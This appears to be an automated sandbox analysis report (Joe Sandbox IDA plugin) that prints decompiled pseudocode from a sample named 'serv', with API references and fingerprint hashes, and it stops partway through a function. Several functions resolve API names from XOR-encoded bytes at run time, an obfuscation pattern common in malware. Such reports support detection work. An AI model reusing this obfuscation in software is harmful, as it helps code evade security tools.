                                                                    0x0041f2d4
                                                                    0x0041f2d9
                                                                    0x0041f2de
                                                                    0x0041f2e3
                                                                    0x0041f2e8
                                                                    0x0041f2ed
                                                                    0x0041f2f2
                                                                    0x0041f2f7
                                                                    0x0041f2fc
                                                                    0x0041f301
                                                                    0x0041f306
                                                                    0x0041f30b
                                                                    0x0041f310
                                                                    0x0041f315
                                                                    0x0041f31a
                                                                    0x0041f31f
                                                                    0x0041f321
                                                                    0x0041f321
                                                                    0x0041f326
                                                                    0x0041f327
                                                                    0x0041f32c
                                                                    0x0041f334
                                                                    0x0041f339
                                                                    0x0041f343
                                                                    0x0041f348
                                                                    0x0041f355
                                                                    0x0041f35d
                                                                    0x0041f363
                                                                    0x00000000
                                                                    0x0041f365
                                                                    0x0041f365
                                                                    0x0041f36b
                                                                    0x0041f373
                                                                    0x0041f379
                                                                    0x0041f383
                                                                    0x0041f38f
                                                                    0x0041f396
                                                                    0x0041f39c
                                                                    0x0041f39e
                                                                    0x0041f39e
                                                                    0x0041f3a0
                                                                    0x0041f3ad
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041f379
                                                                    0x0041f37c
                                                                    0x0041f37c
                                                                    0x0041f382
                                                                    0x0041f382
                                                                    0x0041f33b
                                                                    0x0041f342
                                                                    0x0041f342

                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(000000C9), ref: 0041F355
                                                                    • GetProcAddress.KERNEL32(00000000,Ch{D), ref: 0041F36B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Ch{D$c$o$r
                                                                    • API String ID: 2574300362-1364534458
                                                                    • Opcode ID: 514d3dc774f37e81766c8d3ab85fe732d3e6d5683ae72d2203f5afa81dfde80f
                                                                    • Instruction ID: 6d2cee5cf06e2373cc58e546c6cd093d6d98c9fbf8c50c938b505b46c62d6698
                                                                    • Opcode Fuzzy Hash: 514d3dc774f37e81766c8d3ab85fe732d3e6d5683ae72d2203f5afa81dfde80f
                                                                    • Instruction Fuzzy Hash: 4D31462120C78299D321DA3D980478BBFE45BD6214F884A9DE5F8C63E2D264C54A87A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041B1B0(struct _SECURITY_ATTRIBUTES* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, long _a20, DWORD* _a24) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				void* _t22;
                                                                    				void* _t24;
                                                                    				CHAR* _t35;
                                                                    
                                                                    				if( *0x447e2c == 0) {
                                                                    					_v14 = 0x51;
                                                                    					_v11 = 0x51;
                                                                    					_v7 = 0x51;
                                                                    					 *_t35 = 0x77;
                                                                    					_v15 = 0x46;
                                                                    					_v13 = 0x55;
                                                                    					_v12 = 0x40;
                                                                    					_v10 = 0x60;
                                                                    					_v9 = 0x5c;
                                                                    					_v8 = 0x46;
                                                                    					_v6 = 0x55;
                                                                    					_v5 = 0x50;
                                                                    					_v4 = 0x34;
                                                                    					_t24 = 0;
                                                                    					do {
                                                                    						 *(_t35 + _t24) =  *(_t35 + _t24) ^ 0x00000034;
                                                                    						_t24 = _t24 + 1;
                                                                    					} while (_t24 < 0xd);
                                                                    					 *0x447e2c = E0041A600(_t35);
                                                                    				}
                                                                    				_t22 = CreateThread(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                                    				return _t22;
                                                                    			}


















                                                                    0x0041b1ba
                                                                    0x0041b1c2
                                                                    0x0041b1c6
                                                                    0x0041b1ca
                                                                    0x0041b1ce
                                                                    0x0041b1d2
                                                                    0x0041b1d6
                                                                    0x0041b1da
                                                                    0x0041b1df
                                                                    0x0041b1e4
                                                                    0x0041b1e9
                                                                    0x0041b1ed
                                                                    0x0041b1f1
                                                                    0x0041b1f6
                                                                    0x0041b1fb
                                                                    0x0041b200
                                                                    0x0041b200
                                                                    0x0041b204
                                                                    0x0041b205
                                                                    0x0041b216
                                                                    0x0041b216
                                                                    0x0041b239
                                                                    0x0041b23e

                                                                    APIs
                                                                    • CreateThread.KERNELBASE(?,?,?,?,?,?,00414310,00000000,00000000,?,00000001), ref: 0041B239
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID: 4$@$P$\$`
                                                                    • API String ID: 2422867632-4267801357
                                                                    • Opcode ID: 7311cce1a9e6ab2cd0b4aed45ea4ab08beb2d1e66b3e3b8d9bd1d9f9a9c604a3
                                                                    • Instruction ID: f37bb75f9116e092b5d1779d2c1d2904f2ead29bb3ee6384b4d2636e374727ac
                                                                    • Opcode Fuzzy Hash: 7311cce1a9e6ab2cd0b4aed45ea4ab08beb2d1e66b3e3b8d9bd1d9f9a9c604a3
                                                                    • Instruction Fuzzy Hash: 0E114F6500D3809ED301D769D484A4BBFE55FE9608F04CD8CE1DC87252D679D909CB67
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041B470(void* _a4, void* _a8, long _a12, DWORD* _a16, struct _OVERLAPPED* _a20) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				int _t18;
                                                                    				void* _t20;
                                                                    				CHAR* _t29;
                                                                    
                                                                    				if( *0x447e58 == 0) {
                                                                    					_v8 = 0x4b;
                                                                    					_v4 = 0x4b;
                                                                    					 *_t29 = 0x79;
                                                                    					_v11 = 0x5c;
                                                                    					_v10 = 0x47;
                                                                    					_v9 = 0x5a;
                                                                    					_v7 = 0x68;
                                                                    					_v6 = 0x47;
                                                                    					_v5 = 0x42;
                                                                    					_v3 = 0x2e;
                                                                    					_t20 = 0;
                                                                    					do {
                                                                    						 *(_t29 + _t20) =  *(_t29 + _t20) ^ 0x0000002e;
                                                                    						_t20 = _t20 + 1;
                                                                    					} while (_t20 < 0xa);
                                                                    					 *0x447e58 = E0041A600(_t29);
                                                                    				}
                                                                    				_t18 = WriteFile(_a4, _a8, _a12, _a16, _a20); // executed
                                                                    				return _t18;
                                                                    			}















                                                                    0x0041b47a
                                                                    0x0041b480
                                                                    0x0041b484
                                                                    0x0041b488
                                                                    0x0041b48c
                                                                    0x0041b491
                                                                    0x0041b495
                                                                    0x0041b49a
                                                                    0x0041b49f
                                                                    0x0041b4a3
                                                                    0x0041b4a8
                                                                    0x0041b4ad
                                                                    0x0041b4b0
                                                                    0x0041b4b0
                                                                    0x0041b4b4
                                                                    0x0041b4b5
                                                                    0x0041b4c6
                                                                    0x0041b4c6
                                                                    0x0041b4e4
                                                                    0x0041b4e9

                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?), ref: 0041B4E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID: .$B$Z$\$h
                                                                    • API String ID: 3934441357-343618136
                                                                    • Opcode ID: b9b21e5b08b9d8b1a76abf4df65287e8640ae3171ae258463ff2cd3b1f67faf0
                                                                    • Instruction ID: 9e62ccc2ccab6145aa0e6263bf661d2063b954a4fc4054bab73281166bffa068
                                                                    • Opcode Fuzzy Hash: b9b21e5b08b9d8b1a76abf4df65287e8640ae3171ae258463ff2cd3b1f67faf0
                                                                    • Instruction Fuzzy Hash: 7A015AA110C3C0AED301DBA8E844A5BBFE55BE6304F18CD5CF0D887242D279C84AC72B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00428EC6(void* __ecx, intOrPtr* _a4, signed int* _a8, CHAR* _a12, signed int _a16, signed int _a20) {
                                                                    				signed int _v5;
                                                                    				char _v6;
                                                                    				signed int _v12;
                                                                    				long _v16;
                                                                    				signed char _v18;
                                                                    				long _v20;
                                                                    				struct _SECURITY_ATTRIBUTES _v32;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t82;
                                                                    				signed int _t84;
                                                                    				signed char _t85;
                                                                    				void* _t90;
                                                                    				signed int _t93;
                                                                    				signed int _t94;
                                                                    				signed int _t100;
                                                                    				signed int* _t102;
                                                                    				long _t103;
                                                                    				signed int _t107;
                                                                    				signed int* _t112;
                                                                    				signed int _t115;
                                                                    				void* _t117;
                                                                    				long _t119;
                                                                    				signed int _t120;
                                                                    				intOrPtr* _t121;
                                                                    				void* _t122;
                                                                    				signed int _t131;
                                                                    				signed char _t134;
                                                                    				signed int _t138;
                                                                    				long _t141;
                                                                    				void* _t142;
                                                                    				signed int _t144;
                                                                    				void* _t153;
                                                                    
                                                                    				_t122 = __ecx;
                                                                    				_t134 = _a16;
                                                                    				_v32.nLength = 0xc;
                                                                    				_v32.lpSecurityDescriptor = 0;
                                                                    				if(_t134 >= 0) {
                                                                    					_v32.bInheritHandle = 1;
                                                                    					_v5 = 0;
                                                                    				} else {
                                                                    					_v32.bInheritHandle = 0;
                                                                    					_v5 = 0x10;
                                                                    				}
                                                                    				if((0x00008000 & _t134) != 0) {
                                                                    					L7:
                                                                    					_t119 = 3;
                                                                    					_t82 = _t134 & _t119;
                                                                    					if(_t82 == 0) {
                                                                    						_v20 = 0x80000000;
                                                                    						L13:
                                                                    						if(_t122 == 0x10) {
                                                                    							_v12 = 0;
                                                                    							L22:
                                                                    							_t84 = _t134 & 0x00000700;
                                                                    							__eflags = _t84 - 0x400;
                                                                    							if(__eflags > 0) {
                                                                    								__eflags = _t84 - 0x500;
                                                                    								if(_t84 == 0x500) {
                                                                    									L37:
                                                                    									_v16 = 1;
                                                                    									L38:
                                                                    									_t85 = _a16;
                                                                    									__eflags = 0x00000100 & _t85;
                                                                    									_t141 = 0x80;
                                                                    									if((0x00000100 & _t85) != 0) {
                                                                    										_t131 =  *0x448264; // 0x0
                                                                    										__eflags =  !_t131 & _a20;
                                                                    										if(( !_t131 & _a20) >= 0) {
                                                                    											_t141 = 1;
                                                                    											__eflags = 1;
                                                                    										}
                                                                    									}
                                                                    									__eflags = _t85 & 0x00000040;
                                                                    									if((_t85 & 0x00000040) != 0) {
                                                                    										_v18 = _v18 | 0x00000001;
                                                                    										_t141 = _t141 | 0x04000000;
                                                                    										__eflags =  *0x448268 - 2;
                                                                    										if( *0x448268 == 2) {
                                                                    											_t34 =  &_v12;
                                                                    											 *_t34 = _v12 | 0x00000004;
                                                                    											__eflags =  *_t34;
                                                                    										}
                                                                    									}
                                                                    									__eflags = _t85 & 0x00000010;
                                                                    									if((_t85 & 0x00000010) != 0) {
                                                                    										_t141 = _t141 | 0x00000100;
                                                                    										__eflags = _t141;
                                                                    									}
                                                                    									__eflags = _t85 & 0x00000020;
                                                                    									if(__eflags == 0) {
                                                                    										__eflags = _t85 & 0x00000010;
                                                                    										if(__eflags != 0) {
                                                                    											_t141 = _t141 | 0x10000000;
                                                                    											__eflags = _t141;
                                                                    										}
                                                                    									} else {
                                                                    										_t141 = _t141 | 0x08000000;
                                                                    									}
                                                                    									_t138 = E00428BF3(_t119, 0x100, _t141, __eflags);
                                                                    									_t120 = _t119 | 0xffffffff;
                                                                    									__eflags = _t138 - _t120;
                                                                    									if(_t138 != _t120) {
                                                                    										 *_a4 = 1;
                                                                    										 *_a8 = _t138;
                                                                    										_t90 = CreateFileA(_a12, _v20, _v12,  &_v32, _v16, _t141, 0); // executed
                                                                    										_t142 = _t90;
                                                                    										__eflags = _t142 - _t120;
                                                                    										if(_t142 == _t120) {
                                                                    											L56:
                                                                    											E00426868(GetLastError());
                                                                    											goto L52;
                                                                    										}
                                                                    										_t94 = GetFileType(_t142); // executed
                                                                    										__eflags = _t94;
                                                                    										if(_t94 != 0) {
                                                                    											__eflags = _t94 - 2;
                                                                    											if(_t94 != 2) {
                                                                    												__eflags = _t94 - 3;
                                                                    												if(_t94 == 3) {
                                                                    													_t51 =  &_v5;
                                                                    													 *_t51 = _v5 | 0x00000008;
                                                                    													__eflags =  *_t51;
                                                                    												}
                                                                    											} else {
                                                                    												_v5 = _v5 | 0x00000040;
                                                                    											}
                                                                    											E004289F5(_t138, _t142);
                                                                    											_v5 = _v5 | 0x00000001;
                                                                    											_t121 = 0x44b140 + (_t138 >> 5) * 4;
                                                                    											_t100 = _v5;
                                                                    											_t127 =  *_t121;
                                                                    											_t144 = (_t138 & 0x0000001f) + (_t138 & 0x0000001f) * 8 << 2;
                                                                    											_v5 = _t100;
                                                                    											_t61 =  &_v5;
                                                                    											 *_t61 = _v5 & 0x00000048;
                                                                    											__eflags =  *_t61;
                                                                    											 *((char*)(_t144 +  *_t121 + 4)) = _t100;
                                                                    											if( *_t61 != 0) {
                                                                    												L66:
                                                                    												__eflags = _v5;
                                                                    												if(_v5 == 0) {
                                                                    													__eflags = _a16 & 0x00000008;
                                                                    													if((_a16 & 0x00000008) != 0) {
                                                                    														_t74 =  *_t121 + 4; // 0x4
                                                                    														_t102 = _t144 + _t74;
                                                                    														 *_t102 =  *_t102 | 0x00000020;
                                                                    														__eflags =  *_t102;
                                                                    													}
                                                                    												}
                                                                    												_t93 = _t138;
                                                                    												goto L70;
                                                                    											} else {
                                                                    												__eflags = _t100;
                                                                    												if(_t100 >= 0) {
                                                                    													goto L66;
                                                                    												}
                                                                    												__eflags = _a16 & 0x00000002;
                                                                    												if(__eflags == 0) {
                                                                    													goto L66;
                                                                    												}
                                                                    												_t103 = E004284D0(__eflags, _t138, 0xffffffff, 2);
                                                                    												__eflags = _t103 - 0xffffffff;
                                                                    												_v20 = _t103;
                                                                    												if(_t103 != 0xffffffff) {
                                                                    													_v6 = 0;
                                                                    													__eflags = E00426055(_t138,  &_v6, 1);
                                                                    													if(__eflags != 0) {
                                                                    														L75:
                                                                    														__eflags = E004284D0(__eflags, _t138, 0, 0) - 0xffffffff;
                                                                    														if(__eflags != 0) {
                                                                    															goto L66;
                                                                    														}
                                                                    														L76:
                                                                    														_t107 = E0042643C(__eflags, _t138);
                                                                    														L35:
                                                                    														_t93 = _t107 | 0xffffffff;
                                                                    														goto L70;
                                                                    													}
                                                                    													__eflags = _v6 - 0x1a;
                                                                    													if(__eflags != 0) {
                                                                    														goto L75;
                                                                    													}
                                                                    													__eflags = E00429E28(_t121, _t127, 0x700, _t138, _t144, __eflags, _t138, _v20) - 0xffffffff;
                                                                    													if(__eflags == 0) {
                                                                    														goto L76;
                                                                    													}
                                                                    													goto L75;
                                                                    												}
                                                                    												__eflags =  *((intOrPtr*)(E0042685F())) - 0x83;
                                                                    												if(__eflags != 0) {
                                                                    													goto L76;
                                                                    												}
                                                                    												goto L66;
                                                                    											}
                                                                    										}
                                                                    										CloseHandle(_t142);
                                                                    										goto L56;
                                                                    									} else {
                                                                    										 *((intOrPtr*)(E00426856())) = 0x18;
                                                                    										_t112 = E0042685F();
                                                                    										 *_t112 =  *_t112 & 0x00000000;
                                                                    										__eflags =  *_t112;
                                                                    										L52:
                                                                    										_t93 = _t120;
                                                                    										L70:
                                                                    										return _t93;
                                                                    									}
                                                                    								}
                                                                    								__eflags = _t84 - 0x600;
                                                                    								if(_t84 == 0x600) {
                                                                    									L36:
                                                                    									_v16 = 5;
                                                                    									goto L38;
                                                                    								}
                                                                    								__eflags = _t84 - 0x700;
                                                                    								if(_t84 == 0x700) {
                                                                    									goto L37;
                                                                    								}
                                                                    								L34:
                                                                    								 *((intOrPtr*)(E00426856())) = 0x16;
                                                                    								_t107 = E0042685F();
                                                                    								 *_t107 = 0;
                                                                    								goto L35;
                                                                    							}
                                                                    							if(__eflags == 0) {
                                                                    								L30:
                                                                    								_v16 = _t119;
                                                                    								goto L38;
                                                                    							}
                                                                    							__eflags = _t84;
                                                                    							if(_t84 == 0) {
                                                                    								goto L30;
                                                                    							}
                                                                    							__eflags = _t84 - 0x100;
                                                                    							if(_t84 == 0x100) {
                                                                    								_v16 = 4;
                                                                    								goto L38;
                                                                    							}
                                                                    							__eflags = _t84 - 0x200;
                                                                    							if(_t84 == 0x200) {
                                                                    								goto L36;
                                                                    							}
                                                                    							__eflags = _t84 - 0x300;
                                                                    							if(_t84 != 0x300) {
                                                                    								goto L34;
                                                                    							}
                                                                    							_v16 = 2;
                                                                    							goto L38;
                                                                    						}
                                                                    						if(_t122 == 0x20) {
                                                                    							_v12 = 1;
                                                                    							goto L22;
                                                                    						}
                                                                    						if(_t122 == 0x30) {
                                                                    							_v12 = 2;
                                                                    							goto L22;
                                                                    						}
                                                                    						if(_t122 == 0x40) {
                                                                    							_v12 = _t119;
                                                                    							goto L22;
                                                                    						}
                                                                    						L17:
                                                                    						 *((intOrPtr*)(E00426856())) = 0x16;
                                                                    						_t115 = E0042685F();
                                                                    						 *_t115 = 0;
                                                                    						return _t115 | 0xffffffff;
                                                                    					}
                                                                    					_t117 = _t82 - 1;
                                                                    					if(_t117 == 0) {
                                                                    						_v20 = 0x40000000;
                                                                    						goto L13;
                                                                    					}
                                                                    					if(_t117 != 1) {
                                                                    						goto L17;
                                                                    					} else {
                                                                    						_v20 = 0xc0000000;
                                                                    						goto L13;
                                                                    					}
                                                                    				} else {
                                                                    					if((_t134 & 0x00000040) != 0) {
                                                                    						L6:
                                                                    						_v5 = _v5 | 0x00000080;
                                                                    						goto L7;
                                                                    					}
                                                                    					_t153 =  *0x448594 - 0x8000; // 0x0
                                                                    					if(_t153 == 0) {
                                                                    						goto L7;
                                                                    					}
                                                                    					goto L6;
                                                                    				}
                                                                    			}






































                                                                    0x00428ec6
                                                                    0x00428ecc
                                                                    0x00428ed5
                                                                    0x00428edc
                                                                    0x00428edf
                                                                    0x00428eea
                                                                    0x00428ef1
                                                                    0x00428ee1
                                                                    0x00428ee1
                                                                    0x00428ee4
                                                                    0x00428ee4
                                                                    0x00428efc
                                                                    0x00428f0f
                                                                    0x00428f13
                                                                    0x00428f16
                                                                    0x00428f18
                                                                    0x00428f32
                                                                    0x00428f39
                                                                    0x00428f3c
                                                                    0x00428f7e
                                                                    0x00428f81
                                                                    0x00428f88
                                                                    0x00428f8f
                                                                    0x00428f97
                                                                    0x00428fc8
                                                                    0x00428fcd
                                                                    0x00428ffd
                                                                    0x00428ffd
                                                                    0x00429004
                                                                    0x00429004
                                                                    0x00429007
                                                                    0x00429009
                                                                    0x0042900e
                                                                    0x00429010
                                                                    0x0042901b
                                                                    0x0042901d
                                                                    0x00429021
                                                                    0x00429021
                                                                    0x00429021
                                                                    0x0042901d
                                                                    0x00429022
                                                                    0x00429024
                                                                    0x00429026
                                                                    0x0042902a
                                                                    0x00429030
                                                                    0x00429037
                                                                    0x00429039
                                                                    0x00429039
                                                                    0x00429039
                                                                    0x00429039
                                                                    0x00429037
                                                                    0x0042903d
                                                                    0x00429040
                                                                    0x00429042
                                                                    0x00429042
                                                                    0x00429042
                                                                    0x00429044
                                                                    0x00429046
                                                                    0x00429050
                                                                    0x00429052
                                                                    0x00429054
                                                                    0x00429054
                                                                    0x00429054
                                                                    0x00429048
                                                                    0x00429048
                                                                    0x00429048
                                                                    0x0042905f
                                                                    0x00429061
                                                                    0x00429064
                                                                    0x00429066
                                                                    0x0042908b
                                                                    0x00429094
                                                                    0x004290a3
                                                                    0x004290a9
                                                                    0x004290ab
                                                                    0x004290ad
                                                                    0x004290c1
                                                                    0x004290c8
                                                                    0x00000000
                                                                    0x004290cd
                                                                    0x004290b0
                                                                    0x004290b6
                                                                    0x004290b8
                                                                    0x004290d0
                                                                    0x004290d3
                                                                    0x004290db
                                                                    0x004290de
                                                                    0x004290e0
                                                                    0x004290e0
                                                                    0x004290e0
                                                                    0x004290e0
                                                                    0x004290d5
                                                                    0x004290d5
                                                                    0x004290d5
                                                                    0x004290e6
                                                                    0x004290eb
                                                                    0x004290f4
                                                                    0x00429103
                                                                    0x00429108
                                                                    0x0042910a
                                                                    0x0042910d
                                                                    0x00429110
                                                                    0x00429110
                                                                    0x00429110
                                                                    0x00429114
                                                                    0x00429118
                                                                    0x00429146
                                                                    0x00429146
                                                                    0x0042914a
                                                                    0x0042914c
                                                                    0x00429150
                                                                    0x00429154
                                                                    0x00429154
                                                                    0x00429158
                                                                    0x00429158
                                                                    0x00429158
                                                                    0x00429150
                                                                    0x0042915b
                                                                    0x00000000
                                                                    0x0042911a
                                                                    0x0042911a
                                                                    0x0042911c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042911e
                                                                    0x00429122
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429129
                                                                    0x00429131
                                                                    0x00429134
                                                                    0x00429137
                                                                    0x00429169
                                                                    0x00429175
                                                                    0x00429177
                                                                    0x0042918f
                                                                    0x0042919c
                                                                    0x0042919f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004291a1
                                                                    0x004291a2
                                                                    0x00428fec
                                                                    0x00428fec
                                                                    0x00000000
                                                                    0x00428fec
                                                                    0x00429179
                                                                    0x0042917d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429188
                                                                    0x0042918d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042918d
                                                                    0x0042913e
                                                                    0x00429144
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429144
                                                                    0x00429118
                                                                    0x004290bb
                                                                    0x00000000
                                                                    0x00429068
                                                                    0x0042906d
                                                                    0x00429073
                                                                    0x00429078
                                                                    0x00429078
                                                                    0x0042907b
                                                                    0x0042907b
                                                                    0x0042915d
                                                                    0x00000000
                                                                    0x0042915d
                                                                    0x00429066
                                                                    0x00428fcf
                                                                    0x00428fd4
                                                                    0x00428ff4
                                                                    0x00428ff4
                                                                    0x00000000
                                                                    0x00428ff4
                                                                    0x00428fd6
                                                                    0x00428fd8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428fda
                                                                    0x00428fdf
                                                                    0x00428fe5
                                                                    0x00428fea
                                                                    0x00000000
                                                                    0x00428fea
                                                                    0x00428f99
                                                                    0x00428fc3
                                                                    0x00428fc3
                                                                    0x00000000
                                                                    0x00428fc3
                                                                    0x00428f9b
                                                                    0x00428f9d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428f9f
                                                                    0x00428fa1
                                                                    0x00428fba
                                                                    0x00000000
                                                                    0x00428fba
                                                                    0x00428fa3
                                                                    0x00428fa8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428faa
                                                                    0x00428faf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428fb1
                                                                    0x00000000
                                                                    0x00428fb1
                                                                    0x00428f41
                                                                    0x00428f75
                                                                    0x00000000
                                                                    0x00428f75
                                                                    0x00428f46
                                                                    0x00428f6c
                                                                    0x00000000
                                                                    0x00428f6c
                                                                    0x00428f4b
                                                                    0x00428f67
                                                                    0x00000000
                                                                    0x00428f67
                                                                    0x00428f4d
                                                                    0x00428f52
                                                                    0x00428f58
                                                                    0x00428f5d
                                                                    0x00000000
                                                                    0x00428f5f
                                                                    0x00428f1a
                                                                    0x00428f1b
                                                                    0x00428f29
                                                                    0x00000000
                                                                    0x00428f29
                                                                    0x00428f1e
                                                                    0x00000000
                                                                    0x00428f20
                                                                    0x00428f20
                                                                    0x00000000
                                                                    0x00428f20
                                                                    0x00428efe
                                                                    0x00428f01
                                                                    0x00428f0b
                                                                    0x00428f0b
                                                                    0x00000000
                                                                    0x00428f0b
                                                                    0x00428f03
                                                                    0x00428f09
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428f09

                                                                    APIs
                                                                    • CreateFileA.KERNELBASE(80000000,80000000,?,0000000C,00000001,00000080,00000000,?,00000000,00000000), ref: 004290A3
                                                                    • GetFileType.KERNELBASE(00000000), ref: 004290B0
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004290BB
                                                                    • GetLastError.KERNEL32 ref: 004290C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastType
                                                                    • String ID: H
                                                                    • API String ID: 1809617866-2852464175
                                                                    • Opcode ID: e45f55f5cad08953091bb8ec50569213ae6d252bea914ca6b0275c789c51d8e0
                                                                    • Instruction ID: 890c1065f39dcc2e19e683cc44ee1677a8af83e3ba3c4683cd4a3a0bc0fb7659
                                                                    • Opcode Fuzzy Hash: e45f55f5cad08953091bb8ec50569213ae6d252bea914ca6b0275c789c51d8e0
                                                                    • Instruction Fuzzy Hash: 95814330B052399AEF208F99E9443BE7B61AF02358FAA415FE410A72C1CB7D4D45C75E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041C4B0(CHAR* _a4, CHAR* _a8, long _a12, DWORD* _a16, DWORD* _a20, DWORD* _a24, CHAR* _a28, long _a32) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				int _t33;
                                                                    				void* _t35;
                                                                    				CHAR* _t49;
                                                                    
